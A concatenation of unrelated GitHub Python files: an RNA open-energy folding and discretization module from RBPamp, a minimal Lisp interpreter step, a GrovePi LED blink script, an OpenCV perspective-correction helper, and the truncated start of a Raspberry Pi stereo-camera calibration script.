fname_disc = self._make_filename(k, disc=disc)\n # print fname_disc\n if os.path.exists(fname_disc):\n return RBNSOpenen(fname_disc, self.reads, k, dummy=self.dummy)\n else:\n raw = self.get_raw(k)\n self.logger.info(\"discretizing '{0}' to satisfy get_discretized({1}) request\".format(raw.fname, k) )\n discretized = raw.discretize(disc=disc, dname=fname_disc)\n discretized.store()\n\n return discretized\n \n def _make_filename(self, k, disc=None):\n if disc:\n #self.k_disc[k] = OpenenDiscretization(k, self.reads.L, self.dtype)\n fmt = disc.to_filename(N=self.reads.N)\n else:\n fmt = \"raw_L{0}_k{1}_{2}\".format(self.reads.L, k, self.raw_dtype.__name__)\n\n base, ext = os.path.splitext(os.path.basename(self.reads.fname))\n fname = os.path.join(self.path, \"{0}.{1}.bin\".format(base, fmt) )\n \n return fname\n\n def _record_raw_bytes(self, k, with_adapter=True):\n itemsize = np.dtype(self.raw_dtype).itemsize\n l = self.reads.L - k + 1\n if with_adapter:\n l += self.reads.l5 + self.reads.l3\n\n return l * itemsize\n\n def has_data(self, k, with_adapter=True):\n fname = self._make_filename(k)\n openen = self.get_raw(k, _do_not_cache=True)\n return openen.check_data(with_adapter=with_adapter)\n\n def has_data_range(self, kmin, kmax):\n yes = True\n for k in range(kmin, kmax+1):\n if not self.has_data(k):\n yes = False\n break\n\n return yes\n\n def count_complete_records_range(self, kmin, kmax, with_adapter=True):\n n = self.reads.N\n for k in range(kmin, kmax+1):\n fname = self._make_filename(k)\n openen = self.get_raw(k, _do_not_cache=True)\n nk = openen.count_records(with_adapter=with_adapter)\n # print fname, nk\n n = min(n, nk)\n \n return n\n\n\n def get_or_create(self, k, records_present=0):\n ### TODO: Add resume suppport by giving expected total number of records nd number of\n ### records to be skipped (both need to be determined prior to folding)\n if not k in self.k_sinks:\n fname = self._make_filename(k)\n self.logger.debug(f\"get_or_create({k}) -> {fname}\")\n if self.has_data(k):\n self.logger.info(\"data for '{}' already in place. 
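# --- Added example (hedged sketch) ---
# get_discretized() above encodes the scheme in the file name, and
# OpenenDiscretization.from_filename() recovers it with a regex. Round-trip:
import re

def to_filename(mode, L, k, N, dtype_name):
    return "discretized_{}_L{}_k{}_N{}_{}".format(mode, L, k, N, dtype_name)

def from_filename(fname):
    pat = r"discretized_(?P<mode>\w+)_L(?P<L>\d+)_k(?P<k>\d+)_N(?P<N>\d+)_(?P<dtype>\w+)"
    return re.search(pat, fname).groupdict()

meta = from_filename("reads." + to_filename("gamma", 40, 7, 1000, "uint8") + ".bin")
assert meta == {"mode": "gamma", "L": "40", "k": "7", "N": "1000", "dtype": "uint8"}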
Will leave '{}' untouched.\".format(k, fname))\n self.k_sinks[k] = DummySink(fname)\n\n else:\n bytes_keep = self._record_raw_bytes(k) * records_present\n sink = FileSink(fname, bytes_keep = bytes_keep)\n self.k_sinks[k] = sink\n self.logger.info(\"prepared '{0}'\".format(fname))\n \n return self.k_sinks[k]\n \n def prepare_sinks(self, kmin, kmax, n_complete=0):\n self.logger.info(\"preparing sinks to resume after {} records\".format(n_complete))\n for k in range(kmin, kmax+1):\n sink = self.get_or_create(k, n_complete)\n\n def write(self, k, vec):\n sink = self.get_or_create(k)\n if self.discretize:\n vec = self.k_disc[k].discretize(vec)\n\n sink.write(vec.tobytes())\n\n def dummy_write(self, k, vec):\n print(\"writing\", k, vec)\n\n def write_set(self, krange, data):\n for k, vec in zip(krange, data):\n self.write(k, vec)\n self.n_sets += 1\n \n def close(self):\n for sink in list(self.k_sinks.values()):\n sink.close()\n \n self.logger.info(\"closed all files after writing {0} data sets\".format(self.n_sets) )\n\n\n # def fix_skipped_reads(self, krange):\n # keep = []\n # for i, line in enumerate(file(self.reads.fname,'r')):\n # if 'N' in line.upper():\n # keep.append(False)\n # else:\n # keep.append(True)\n \n # keep = np.array(keep, dtype=bool)\n\n # n_skip = (keep == False).sum()\n # print \"rows to drop\", n_skip\n \n # n_reads = self.reads.N\n \n # def fixit(openen):\n # openen._do_not_unpickle = True\n # print \"checking\", openen.fname\n # if openen.N - n_skip == n_reads:\n # print \"removing extra rows!\"\n # oem = openen.oem[keep]\n # assert len(oem) == n_reads\n \n # new = RBNSOpenen(openen.fname, self.reads, k, oem = oem, disc=openen.disc)\n # new.debug_caching = True\n # new._do_not_unpickle = True\n # assert len(new.oem) == n_reads\n # assert new.N == n_reads\n # new.store()\n \n # check = RBNSOpenen(openen.fname, self.reads, k, oem = oem, disc=openen.disc, _do_not_unpickle=True)\n # assert len(check.oem) == n_reads\n # assert check.N == n_reads\n \n # else:\n # print \"File is already correct!\"\n \n # for k in krange:\n # try:\n # fixit(self.get_raw(k))\n # except IOError:\n # pass\n \n # try:\n # fixit(self.get_discretized(k))\n # except IOError:\n # pass\n \n # self.cache_flush()\n\nclass OpenenDiscretization(object):\n \"\"\"\n To save space and time, open-energy values are discretized. This class offers the tools\n to determine optimal bins, discretize floating point raw values, and convert \n (approximately) back.\n \"\"\"\n \n # parameters of the gamma distribution that best approximate the k-mer open energy\n # distribution observed for a sample of real RBNS input reads of length L. 
\n # key is (L, k)\n opt_gamma_params = {\n (20,3) : (0.81302029638841211, -4.8516107653608754e-11, 1.6349961361376417),\n (20,4) : (0.76963400095617862, 5.0499197572751555e-12, 2.4086755693934219),\n (20,5) : (0.94430616311716076, -5.4020522985407265e-08, 3.1066652289455501),\n (20,6) : (1.3817737299304014, -0.064612855898649235, 2.4524518251440384),\n (20,7) : (2.2979596639625823, -0.41897928143131891, 1.8285816311839422),\n (20,8) : (3.3450059235858616, -0.88683930998285865, 1.5279577374464515),\n\n (40,1) : (0.56359570197492048, -5.8776308767500606e-30, 0.86206668592641167),\n (40,3) : (1.0628281681967706, -6.8214607159662128e-05, 1.2402078509734689),\n (40,4) : (1.2674929471836962, -0.0020650480683494271, 1.2929616570525289),\n (40,5) : (1.4888004568584394, -0.0081636662031228657, 1.3237981203329996),\n (40,6) : (1.7285627206360989, -0.021580429627936448, 1.3376752736147013),\n (40,7) : (2.0032560511697439, -0.046740618049563296, 1.3323232531823281),\n (40,8) : (2.2847020288586801, -0.086073860842223043, 1.3242768850690814),\n }\n\n opt_E_max = {\n (20,1) : 6.,\n (20,2) : 6.5,\n (20,3) : 7.,\n (20,4) : 8.,\n (20,5) : 10.,\n (20,6) : 10.,\n (20,7) : 10.,\n (20,8) : 11.,\n (20,9) : 12.,\n (20,10) : 13.,\n (20,11) : 14.,\n (40,1) : 3.,\n (40,2) : 4.,\n (40,3) : 6.,\n (40,4) : 8.,\n (40,5) : 9.,\n (40,6) : 10.,\n (40,7) : 11.,\n (40,8) : 12.,\n }\n def __init__(self, k, L, dtype=np.uint8, mode='gamma', N=0):\n self.n = 2**(dtype().nbytes*8) # highest number of bins encodable by dtype\n self.k = k\n self.L = L\n self.N = N\n self.dtype = dtype\n self.mode = mode\n \n if mode == 'gamma':\n import scipy.stats\n step = 1./self.n\n q = np.arange(0,1.+step,step) # n+1 \"percentiles\"\n params = OpenenDiscretization.opt_gamma_params[(L, k)]\n \n # compute optimal bin boundaries\n self.bins = scipy.stats.gamma.ppf(q, *params)\n \n # compute openen values that optimally represent each bin\n q_x = q[:-1] + 0.5*step\n self.x = np.array(scipy.stats.gamma.ppf(q_x, *params), dtype=np.float32)\n \n elif mode == 'linear':\n E_max = OpenenDiscretization.opt_E_max[(L, k)]\n step = E_max / self.n\n self.bins = np.arange(0, E_max + step, step, dtype=np.float32)\n self.bins[0] -= step\n self.x = 0.5*(self.bins[1:] + self.bins[:-1])\n else:\n raise ValueError(\"unknown discretization mode '{0}'\".format(mode))\n \n self.dx = self.bins[1:] - self.bins[:-1]\n\n def __str__(self):\n return \"OpenenDiscretization(L={self.L} k={self.k} dtype={self.dtype} mode={self.mode})\".format(self=self)\n\n @staticmethod\n def optimal_gamma_params_from_raw(openen, n_max=0):\n L = openen.rbns_reads.L\n k = openen.k\n import scipy.stats\n if n_max:\n data = openen.oem[:n_max]\n else:\n data = openen.oem\n opt = scipy.stats.gamma.fit(data)\n \n return (L,k),opt\n \n @staticmethod\n def from_filename(fname):\n import re\n M = re.search(r'discretized_(?P<mode>\\w+)_L(?P<L>\\d+)_k(?P<k>\\d+)_N(?P<N>\\d+)_(?P<dtype>\\w+)', fname)\n d = M.groupdict()\n L = int(d['L'])\n k = int(d['k'])\n N = int(d['N'])\n mode = d['mode']\n dtype_name = d['dtype']\n dtype = getattr(np, dtype_name)\n \n return OpenenDiscretization(k, L, dtype, mode=mode, N=N)\n \n def to_filename(self,N=0):\n if not N:\n N = self.N\n return \"discretized_{self.mode}_L{self.L}_k{self.k}_N{N}_{self.dtype.__name__}\".format(self = self, N=N)\n \n def discretize(self, data):\n #print \"data\", data.shape\n #print \"examples\", data[:10,:]\n #print \"minmax\", data.min(), data.max(), np.median(data), (1 - np.isfinite(data)).sum()\n #print \"issues\"\n #mask = (1 - 
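# --- Added example (hedged sketch; illustrative gamma parameters only) ---
# The 'gamma' mode above spends one bin per equal-probability quantile of the
# fitted distribution, giving the frequent low energies the finest resolution:
import numpy as np
import scipy.stats

shape, loc, scale = 2.0, 0.0, 1.8
n = 256                                   # 2**8 bins for a uint8 code
q = np.arange(0, 1.0 + 1.0 / n, 1.0 / n)  # n + 1 percentile edges
bins = scipy.stats.gamma.ppf(q, shape, loc, scale)
x = scipy.stats.gamma.ppf(q[:-1] + 0.5 / n, shape, loc, scale)  # bin representatives
assert len(bins) == n + 1 and len(x) == n and np.all(np.diff(bins) > 0)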
np.isfinite(data))\n #print mask.sum()\n #x = mask.nonzero()\n #for i in x:\n #print i, data[i]\n \n #print \"bins\", self.bins\n #print \"dtype\", self.dtype\n \n #import RBPamp.digitize as cd\n #return cd.digitize(data, self.bins, dtype=self.dtype) - 1\n #return np.array(np.digitize(data, self.bins) - 1, dtype=self.dtype)\n \n res = cyska.digitize_32fp_8bit(data, self.bins) - 1\n return res\n \n \n\n def get_hist_xy(self, counts, normed=False):\n \"\"\"\n Takes a vector with bin-counts.\n Returns x and y coordinates that represent the underlying density \n (ready for plotting). If normed==True, the trapz integral is 1. \n If normed==False, the integral is counts.sum().\n \"\"\"\n y = counts/self.dx\n y /= np.trapz(y, self.x)\n\n if not normed:\n y *= counts.sum()\n\n return self.x, y\n \n\ninterrupt_folding = Event()\n\ndef interrupt():\n logger = logging.getLogger('fold.interrupt')\n interrupt_folding.set()\n if folding_in_progress:\n logger.warning(\"parallel folding run interrupted\")\n\n# Here come a couple of functions that allow parallel folding using the multiprocessing \n# module and RNAplfold\ndef queue_iter(queue, stop_item = None, interrupt_event=interrupt_folding):\n \"\"\"\n Small generator/wrapper around multiprocessing.Queue allowing simple\n for-loop semantics: \n \n for item in queue_iter(queue):\n ...\n\n \"\"\"\n while True:\n if interrupt_event.is_set():\n break\n \n item = queue.get()\n if item == stop_item:\n # signals end->exit\n break\n else:\n yield item\n\n\ndef seq_dispatcher(src, queue, chunk_size=100, max_depth=50, throttle_sleep=1., n_max=0, interrupt_event=interrupt_folding, **kwargs):\n \"\"\"\n Reads sequences from src and groups them in chunks of up to chunk_size.\n Each chunk is enumerated and the tuple (n_chunk, chunk) is pushed to the queue \n for processing. Avoids overly inflating the queue by sleeping if max_depth chunks are\n already queued.\n \"\"\"\n\n logger = logging.getLogger('fold.seq_dispatcher')\n chunk = []\n n_chunk = 0\n n_seqs = 0\n n_skipped = 0\n for read in src:\n read = read.upper()\n if 'N' in read:\n n_skipped += 1\n continue\n\n chunk.append( read )\n n_seqs += 1\n if len(chunk) >= chunk_size:\n # avoid overloading the queue\n while queue.qsize() > max_depth:\n #logger.debug('qsize > {0} -> sleeping for {1} second'.format(max_depth, throttle_sleep) )\n time.sleep(throttle_sleep)\n\n queue.put( (n_chunk, chunk) )\n n_chunk += 1\n chunk = []\n\n if n_max and n_seqs >= n_max:\n break\n\n if interrupt_event.is_set():\n logger.info('interrupted after {0} sequences dispatched ({2} skipped bc of non-ACGT letters) in {1} chunks. Removing unprocessed chunks from the queue.'.format(n_seqs, n_chunk, n_skipped) )\n while not queue.empty():\n queue.get(False)\n\n return\n \n if chunk:\n queue.put( (n_chunk, chunk) )\n n_chunk += 1\n\n logger.info('{0} sequences dispatched ({2} skipped bc of non-ACGT letters) in {1} chunks. Closing down.'.format(n_seqs, n_chunk, n_skipped) )\n\ndef fold_worker(seq_queue, data_queue, interrupt_event=interrupt_folding, **vienna_kwargs):\n \"\"\"\n Use a ViennaOpenen RNAplfold wrapper instance to compute open-energies for\n chunks of sequences from seq_queue. Results are also grouped into chunks and\n pushed (with the original chunk number) onto data_queue. 
This allows to order \n the chunks later and write the results in the same order as the original \n sequences.\n \"\"\"\n vienna = ViennaOpenen(**vienna_kwargs)\n for n_block, block in queue_iter(seq_queue, interrupt_event=interrupt_event):\n # received a chunk of sequences. Fold them en-bloc\n results = list(vienna.process_sequences(block))\n \n # and return results\n data_queue.put( (n_block, results) )\n \n # cleaning up\n vienna.close()\n\n\ndef result_collector(storage, res_queue, n_complete=0, n_left=-1, k_min=1, k_max=12, interrupt_event = interrupt_folding, log_address=\"\", log_format=\"\", **kwargs):\n \"\"\"\n Pops (n_chunk, results) from res_queue and inserts them into a heap\n (sorted on n_chunk). Keeping track of how many chunks were already passed on\n to storage, it uses the heap to make sure chunks are stored in the correct \n order and no chunk gets skipped.\n \"\"\"\n import heapq\n heap = []\n n_chunk_needed = 0\n t0 = time.time()\n t1 = t0\n n_rec = 0\n\n from RBPamp.zmq_logging import LoggerFactory\n zmq_logging = LoggerFactory(address=log_address, format_str=log_format)\n logger = zmq_logging.getLogger('fold.result_collector')\n\n if n_complete:\n storage.prepare_sinks(k_min, k_max, n_complete=n_complete)\n\n for n_chunk, results in queue_iter(res_queue, interrupt_event=interrupt_event):\n heapq.heappush(heap, (n_chunk, results) )\n \n # as long as the root of the heap is the next needed chunk\n # pass results on to storage\n while(heap and (heap[0][0] == n_chunk_needed)):\n n_chunk, results = heapq.heappop(heap) # retrieves heap[0]\n for krange, data in results:\n storage.write_set(krange, data)\n n_rec += 1\n \n n_chunk_needed += 1\n\n # debug output on average throughput\n t2 = time.time()\n if t2-t1 > 30:\n dT = t2 - t0\n rate = n_rec/dT\n \n n_remain = n_left - n_rec\n eta = n_remain / rate / 60 / 60\n logger.debug(\"processed {0} records in {1:.0f} seconds (average {2:.3f} records/second). ETA={3:.2f} hours\".format(n_rec, dT, rate, eta) )\n t1 = t2\n \n # by the time None pops from the queue, all chunks \n # should have been processed!\n if not interrupt_event.is_set():\n assert len(heap) == 0\n\n # close all open files and make sure stuff is on disk\n storage.close()\n dT = time.time() - t0\n logger.debug(\"finished processing {0} records in {1:.0f} seconds (average {2:.3f} records/second)\".format(n_rec, dT, n_rec/dT) )\n \n\ndef parallel_fold(reads, n_complete=0, n_parallel=8, skip_records=0, k_min=1, k_max=12, **kwargs):\n \"\"\"\n Top-level function for parallel folding. Constructs all the subprocesses\n and ensures proper shutdown. 
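# --- Added example (hedged sketch) ---
# result_collector above restores dispatch order with a heap keyed on the
# chunk number. The reordering idiom on its own:
import heapq

def in_order(chunks):
    heap, want, out = [], 0, []
    for n_chunk, payload in chunks:          # arbitrary arrival order
        heapq.heappush(heap, (n_chunk, payload))
        while heap and heap[0][0] == want:   # drain every now-contiguous chunk
            out.append(heapq.heappop(heap)[1])
            want += 1
    return out

assert in_order([(2, "c"), (0, "a"), (1, "b"), (3, "d")]) == ["a", "b", "c", "d"]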
kwargs are passed to ViennaRNA instances, \n as well as the dispatcher.\n \"\"\"\n # This global variable is used by the keyboard interrupt \n # handler to decide if we need to flush stuff to disk\n global folding_in_progress\n folding_in_progress = True\n \n import multiprocessing\n seq_queue = multiprocessing.Queue()\n res_queue = multiprocessing.Queue()\n \n # fire up the dispatcher: \n #\n # seqs from src-> \n # enumerated chunks->\n # seq_queue\n #\n kwargs['interrupt_event'] = interrupt_folding\n kwargs['temp'] = reads.temp\n kwargs['adap5'] = reads.adap5\n kwargs['adap3'] = reads.adap3\n kwargs['l_insert'] = reads.L\n kwargs['k_min'] = k_min\n kwargs['k_max'] = k_max\n \n n_left = reads.N - n_complete\n kwargs['n_left'] = n_left\n kwargs['n_max'] = n_left\n kwargs['n_complete'] = n_complete\n\n dispatcher = multiprocessing.Process(\n target = seq_dispatcher, \n name='seq_dispatcher', \n args=(reads.iter_reads(n_skip=n_complete), seq_queue),\n kwargs=kwargs \n )\n dispatcher.daemon = True\n dispatcher.start()\n \n # fire up multiple workers: \n #\n # seq_queue-> enumerated seq. chunks-> \\\n # ViennaOpenen(RNAplfold_RBPamp)-> \\\n # enumerated result chunks-> res_queue\n #\n workers = []\n for n in range(n_parallel):\n worker = multiprocessing.Process(\n target = fold_worker, \n name='fold_worker_{0}'.format(n), \n args=(seq_queue, res_queue), \n kwargs=kwargs\n )\n worker.daemon = True\n worker.start()\n workers.append(worker)\n\n # fire up result collector:\n #\n # res_queue-> enumerated result chunks->\n # re-order->\n # write data using storage\n #\n collector = multiprocessing.Process(\n target = result_collector,\n name = 'result_collector',\n args = (reads.acc_storage, res_queue),\n kwargs = kwargs,\n )\n collector.daemon = True\n collector.start()\n \n # wait until all sequences have been thrown onto seq_queue\n dispatcher.join()\n # signal all fold-workers to finish\n for n in range(n_parallel):\n seq_queue.put(None) # each worker consumes exactly one None\n\n for worker in workers:\n # make sure all results are on res_queue by waiting for \n # workers to exit.\n worker.join()\n \n # signal the collector to stop\n res_queue.put(None)\n # and wait until everything has reached storage. 
\n # collector calls storage.close() bc it is in its own subprocess.\n collector.join()\n \n folding_in_progress = False\n \ndef test_discretization(N=10000):\n import matplotlib.pyplot as pp\n x = np.random.gamma(3, size=N)\n print(pp.hist(x, bins=100, normed=True))\n #print hcounts, hbins\n \n disc = OpenenDiscretization(3, 20, np.uint8, 'gamma')\n counts = np.bincount(disc.discretize(x), minlength=256)\n print(disc.x.shape, disc.dx.shape, counts)\n y = counts/disc.dx\n y *= counts.sum() / np.trapz(y, disc.x)\n\n print(np.trapz(y, disc.x), len(x))\n pp.plot(disc.x, y)\n \n pp.show()\n \ndef test_vienna():\n V = ViennaOpenen(k_min=5, k_max=5, l_insert = 40)\n seqs = [\n #'TATACACGCCAGGATGAGCATAGAATCCGCTATCTTTTTT',\n #'AACCGGCTAGTGTATCTAGAGTGGACCAATATTCTTTTGT',\n 'AATTATACCCAACACTTTTTTCCGCATCAAAGATATATAG',\n ]\n \n correct_data = [\n np.array([ 1.37758803e+00, 4.65885401e-02, 4.44491990e-02,\n 4.44544517e-02, 4.37189484e+00, 5.28840590e+00,\n 5.44863987e+00, 6.44182396e+00, 6.40045404e+00,\n 6.11836720e+00, 6.08953190e+00, 6.57561302e+00,\n 6.58033609e+00, 7.80855417e+00, 5.67592812e+00,\n 6.03012180e+00, 6.29798985e+00, 6.51980209e+00,\n 6.32596684e+00, 5.20592594e+00, 5.21245909e+00,\n 5.19603205e+00, 3.84870291e+00, 6.88292726e-04,\n 7.41391385e-04, 3.55043197e+00, 4.00692511e+00,\n 4.00891781e+00, 4.00772381e+00, 4.01971483e+00,\n 4.02041817e+00, 5.34093809e+00, 5.63969707e+00,\n 5.71804190e+00, 5.54887295e+00, 4.88211823e+00], dtype=np.float32\n ),\n np.array([ 1.21388996, 1.29570901, 3.08945203, 1.72082102, 1.58345401, \n 2.14634705, 2.86216402, 2.59196711, 2.52647901, 2.56132007, \n 0.1191803 , 2.34980106, 2.32055211, 2.19572902, 2.50372696, \n 2.59294009, 2.074687 , 3.11443305, 4.6174159 , 2.78021598, \n 2.777704 , 3.70185995, 3.6581161 , 1.99287498, 1.13532197,\n 1.26033103, 0.69037437, 0.70658243, 0.75592059, 0.71988487,\n 0.69261771, 0.07472514, 0.1399269 , 2.3060441 , 3.10272098,\n 2.76067591], dtype=np.float32),\n ]\n\n U5a = seqs[0].index('TTTTT')\n print(U5a)\n U5b = U5a + 1\n for kr, data in V.process_sequences(seqs):\n \n print(data[0][U5a], data[0][U5b])\n \n #for (krange, data), correct in zip(V.process_sequences(seqs), correct_data):\n #print data\n #assert (data == correct).all()\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n #test_discretization()\n # test_vienna()\n # sys.exit(0)\n\n #src = file('/scratch/data/RBNS/RBFOX2/RBFOX2_input.reads') #.readlines()[:30051]\n #storage = OpenenStorage(path='tmp')\n #parallel_fold(src, storage, n_parallel=10)\n #sys.exit(1)\n\n #test_memory_consumption()\n\n from RBPamp.reads import RBNSReads\n reads = RBNSReads('/scratch2/RBNS/RBFOX2/RBFOX2_input.reads', n_max=10000)\n storage = reads.acc_storage.get_raw(1)\n print(storage.oem)\n sys.exit(0) \n \n dopenen = openen.discretize()\n for i in range(10):\n print(dopenen.rbns_reads.seqm[i])\n print(dopenen.oem[i])\n \n \n sys.exit(0)\n \n k8 = np.fromfile('openen.8.raw-float32.bin', dtype=np.float32)\n k7 = np.fromfile('openen.7.raw-float32.bin', dtype=np.float32)\n k6 = np.fromfile('openen.6.raw-float32.bin', dtype=np.float32)\n k5 = np.fromfile('openen.5.raw-float32.bin', dtype=np.float32)\n k4 = np.fromfile('openen.4.raw-float32.bin', dtype=np.float32)\n k3 = np.fromfile('openen.3.raw-float32.bin', dtype=np.float32)\n \n import matplotlib.pyplot as pp\n \n L=40\n k=7\n disc = OpenenDiscretization(7,40,np.uint8)\n print(disc.bins)\n mid = 0.5*(disc.bins[1:] + disc.bins[:-1])\n pp.loglog(mid, disc.x)\n pp.show()\n sys.exit(1)\n \n \n\n #dist = 
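# --- Added example (hedged sketch) ---
# parallel_fold above wires dispatcher -> N workers -> collector, shutting
# down with one None sentinel per worker. The same pattern, minimally:
import multiprocessing

def square_worker(inq, outq):
    for item in iter(inq.get, None):   # run until this worker's None arrives
        outq.put(item * item)

if __name__ == "__main__":
    inq, outq = multiprocessing.Queue(), multiprocessing.Queue()
    procs = [multiprocessing.Process(target=square_worker, args=(inq, outq))
             for _ in range(2)]
    for p in procs:
        p.start()
    for i in range(10):
        inq.put(i)
    for _ in procs:                    # exactly one sentinel per worker
        inq.put(None)
    for p in procs:
        p.join()
    assert sorted(outq.get() for _ in range(10)) == [i * i for i in range(10)]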
scipy.stats.beta # gamma\n dist = scipy.stats.gamma\n data = k8\n \n #params = dist.fit(data)\n #print params\n bins = gamma_bins_k(8,dtype=np.uint8)\n print(\"low bins\",bins[:10])\n print(\"low data\",sorted(data)[:10])\n print(\"low data->bins\", np.digitize(sorted(data)[:10], bins) - 1)\n \n dig = np.digitize(data, bins) -1\n \n print(dig.min(), dig.max())\n print(bins, np.bincount(dig))\n \n mid = 0.5*(bins[1:] + bins[:-1]) # mid-points\n print(len(bins))\n x = np.arange(0, data.max(), .01)\n #pp.hist(data, bins=bins, normed=True)\n #pp.plot(x, dist.pdf(x, *params))\n pp.loglog(data, mid[dig],'ob')\n \n RMSD = np.sqrt(np.mean((mid[dig] - data)**2))\n print(\"RMSD\",RMSD)\n pp.show()\n sys.exit(1)\n \n print(make_bins(5))\n src = open('/scratch/data/RBNS/RBFOX2/RBFOX2_input.reads')\n store = OpenenStorage()\n vienna = ViennaOpenen()\n\n import time\n t0 = time.time()\n for n, krange, data in vienna.process_sequences(src):\n #for n, krange, data in vienna_openen(src, L=64):\n store.store_set(krange, data)\n if n and not n % 1000:\n t1 = time.time()\n print(\"{0:.2f} seqs/second\".format(1000./(t1-t0)))\n t0 = t1\n \n #oa = OpenenHistCollection(name=sys.argv[1])\n \n #tm = ThreadManager(n_threads=4)\n #tm.process_reads(sys.stdin, oa)\n \n #print oa['TGCATGT']\n \n","repo_name":"RomoL2/RegVar","sub_path":"inst/extdata/RBPamp/RBPamp/fold.py","file_name":"fold.py","file_ext":"py","file_size_in_byte":40578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37993479609","text":"from reader import read_str\nfrom printer import pr_str\nfrom mal_types import MalException, Symbol\n\nrepl_env = {\n '+': lambda a, b: a+b,\n '-': lambda a, b: a-b,\n '*': lambda a, b: a*b,\n '/': lambda a, b: a/b\n }\n\n\ndef READ(source):\n return read_str(source)\n\n\ndef EVAL(ast, env):\n if not isinstance(ast, list):\n return eval_ast(ast, env)\n if isinstance(ast, list) and len(ast) == 0:\n return []\n if isinstance(ast, list):\n eval_list = eval_ast(ast, env)\n function = eval_list[0]\n return function(*eval_list[1:])\n\n\ndef PRINT(exp):\n return pr_str(exp)\n\n\ndef REP(source):\n return PRINT(EVAL(READ(source), repl_env))\n\n\ndef eval_ast(ast, env):\n if isinstance(ast, Symbol):\n out = env.get(str(ast))\n if out is None:\n raise MalException(\"symbol not found\")\n else:\n return out\n if isinstance(ast, list):\n if len(ast) == 0:\n return []\n else:\n out = list()\n for x in ast:\n out.append(EVAL(x, env))\n return out\n return ast\n\n\nif __name__ == '__main__':\n header = \"mal START\"\n footer = \"mal END\"\n print(header)\n try:\n while True:\n try:\n data = input('>>')\n print(REP(data))\n except MalException as m:\n print(str(m))\n except (EOFError, KeyboardInterrupt):\n pass\n print(footer)\n","repo_name":"xxmatxx/mal","sub_path":"python/step2_eval.py","file_name":"step2_eval.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29016570495","text":"#Simple testing on GrovePi\n#with two led lights, Blue led on Digitial Port 3\n#Red led on Digital Port 2\n#\n#\n#Author: Alexander Bradshaw\n\nimport time\nimport sys\nfrom grovepi import*\n\n#Initializes ports and pinMode for each of the led lights\nled1 = 3\npinMode(led1, \"OUTPUT\")\n#time.sleep(.5)\n\nled2 = 2\npinMode(led2, \"OUTPUT\")\n#time.sleep(.5)\n\n\n#Alternates between turning on the blue led and red led\n\nwhile True:\n try:\n digitalWrite(led1,1)\n digitalWrite(led2,0)\n 
print(\"Blue Light is on!\")\n time.sleep(1)\n digitalWrite(led1,0)\n digitalWrite(led2,1)\n print(\"Red light is on\")\n time.sleep(1)\n\n except KeyboardInterrupt:\n digitalWrite(led1,0)\n digitalWrite(led2,0)\n sys.exit()\n except IOError:\n print(\"Error\")\n","repo_name":"bradshaw13/AutonomousRobot","sub_path":"simpleled.py","file_name":"simpleled.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2423496807","text":"import cv2\nimport numpy as np\nimport tkinter\nimport matplotlib.pyplot as plt\nimport math\n\n\n#Imports image,contour,and the final size of the perspective correction\n#Exports the perspective corrected image\ndef perspective_trapezoid_to_rect(imgBGR,rectContour,finalSize,mask=None):\n\n imgROI = cv2.bitwise_and(imgBGR,imgBGR,mask=mask)\n\n #Get the corner points (extreme points) of the contour\n leftmost = tuple(rectContour[rectContour[:,:,0].argmin()][0])\n rightmost = tuple(rectContour[rectContour[:,:,0].argmax()][0])\n topmost = tuple(rectContour[rectContour[:,:,1].argmin()][0])\n bottommost = tuple(rectContour[rectContour[:,:,1].argmax()][0])\n\n fromPoints = np.float32([[bottommost[0],bottommost[1]],\n [leftmost[0],leftmost[1]],\n [topmost[0],topmost[1]],\n [rightmost[0],rightmost[1]]])\n\n toPoints = np.float32([[finalSize[0]/2,finalSize[1]],\n [0,finalSize[1]/2],\n [finalSize[0]/2,0],\n [finalSize[0],finalSize[1]/2]])\n\n #Peform the perspective correction\n M = cv2.getPerspectiveTransform(fromPoints,toPoints)\n des = cv2.warpPerspective(imgROI,M,finalSize)\n\n return des\n\n#Import an image and values to translate in the x or y direction\n#Export translated image\ndef translate(img,dx,dy,shape):\n M = np.float32([[1,0,dx],[0,1,dy]])\n dst = cv2.warpAffine(img,M,(shape[1],shape[0]))\n\n return dst\n","repo_name":"Snipesengan/MP_ASSIGNMENT","sub_path":"src/HLD_Transform.py","file_name":"HLD_Transform.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71686188854","text":"import RPi.GPIO as gp\nimport os\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nfrom time import sleep\nimport cv2\nimport numpy as np\nimport time\n\ngp.setwarnings(False)\ngp.setmode(gp.BOARD)\n\ngp.setup(7, gp.OUT)\ngp.setup(11, gp.OUT)\ngp.setup(12, gp.OUT)\n\ngp.setup(15, gp.OUT)\ngp.setup(16, gp.OUT)\ngp.setup(21, gp.OUT)\ngp.setup(22, gp.OUT)\n\ngp.output(11, True)\ngp.output(12, True)\ngp.output(15, True)\ngp.output(16, True)\ngp.output(21, True)\ngp.output(22, True)\n\nprint('Starting the Calibration just press the space bar to exit this part of the Programm\\n')\nprint('Push (s) to save the image you want and push (c) to see next frame without saving the image')\n\ni=0\n\ncamera = PiCamera()\ncamera.resolution = (2560, 720)\nrawCapture = PiRGBArray(camera)\n\nsleep(2)\nk=0\nwhile True:\n\t# take an image from channel 1\n\t# Start Reading Camera images\n\tgp.output(7, False)\n\tgp.output(11, False)\n\tgp.output(12, True)\n\ttime.sleep(0.1)\n\tcamera.capture(rawCapture, format=\"bgr\")\n\tframeR = rawCapture.array\n\trawCapture.truncate(0)\n\tgp.output(7, False)\n\tgp.output(11, True)\n\tgp.output(12, False)\n\ttime.sleep(0.1)\n\tcamera.capture(rawCapture, format=\"bgr\")\n\tframeL = rawCapture.array\n\trawCapture.truncate(0)\n\n\tcv2.imshow('imgR',frameR)\n\tcv2.imshow('imgL',frameL)\n\tcv2.waitKey(10)\n\t\n\tyn = raw_input('Save the image? 
